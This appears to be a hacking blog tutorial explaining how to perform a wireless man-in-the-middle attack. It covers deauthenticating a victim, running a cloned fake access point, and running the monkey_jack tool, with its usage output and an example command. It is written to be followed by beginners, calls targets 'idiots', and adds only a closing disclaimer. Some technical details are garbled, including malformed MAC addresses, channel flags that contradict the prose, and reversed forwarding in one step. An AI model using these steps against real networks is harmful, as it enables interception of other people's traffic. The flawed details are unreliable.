Fabi-Hacker - Wireless Hacking

Wireless Hacking A MITM attack that exploits 802.11 management frame vulnerabilities can be executed by the following steps: 1. You find a wireless iditot that's associated and communicating with an AP - then retrieve the idiots RF channel and MAC address information. 2. You send a deauthenticate or disassociate frame to the idiots system, forcing it to disconnect from the AP. 3. You then enable a fake AP - posing as the original AP, using the same SSID and MAC address, with the only difference being that his system has to run on a different wireless channel - let's say channel 1 instead of channel 6. 4. The idiots system automatically tries to reauthenticate and associate itself with the original AP - only this time the odds are good that it will connect to the your system instead. 5. Your system then connects to the original AP so all client traffic is forwarded to the idiots system - and the idiots traffic is forwarded to your system. The hacker has successfully inserted his system into the middle of the client-to-AP communications stream - and achieved "man in the middle" status. The monkey_jack utility can perform this type of wireless MITM attack. If you have the AirJack suite downloaded and compiled on a Linux-based system, the following can be used to run the program: # ./monkey_jack -h Monkey Jack: Wireless 802.11(b) MITM proof of concept. Usage: ./monkey_jack -b -v -C [ -c ] [ -I ] [ -e ] -a: number of disassociation frames to send (defaults to 7) -t: number of deauthentication frames to send (defaults to 0) -b: bssid, the mac address of the access point (e.g. 00:de:ad:be:ef:00) -v: victim mac address. -c: channel number (1-14) that the access point is on, defaults to current. -C: channel number (1-14) that were going to move them to. -i: the name of the AirJack interface to use (defaults to aj0). -I: the name of the interface to use (defaults to eth1). -e: the essid of the AP. Now you know what is required....heres an example. Ill use monkey_jack to insert our system (using ports aj0 and eth0) between the wireless client 00:09:5B:FF::FF:FF and the AP 00:40:96::FF:FF:FF with and SSID of lolz!. We'll also force it from wireless channel 6 to channel 1, and use the defaults for all other parameters.-----------------> # ./monkey_jack -b 00:40:96:FF:FF:FF -v 00:09:5b:FF:FF:FF -C 6 -c 1 -I eth0 -e "lolz!" Well so there you have it....assuming you received no errors during the execution of the command shown here, your now officially the man in the middle. My next article will discuss ARP poisoning attacks! This article was written for those unfamiliar with wireless hacking. I believe you should only use this technique if you are pen-testing your wireless network and by no means should use this to test other systems without the express permission of the wireless owner.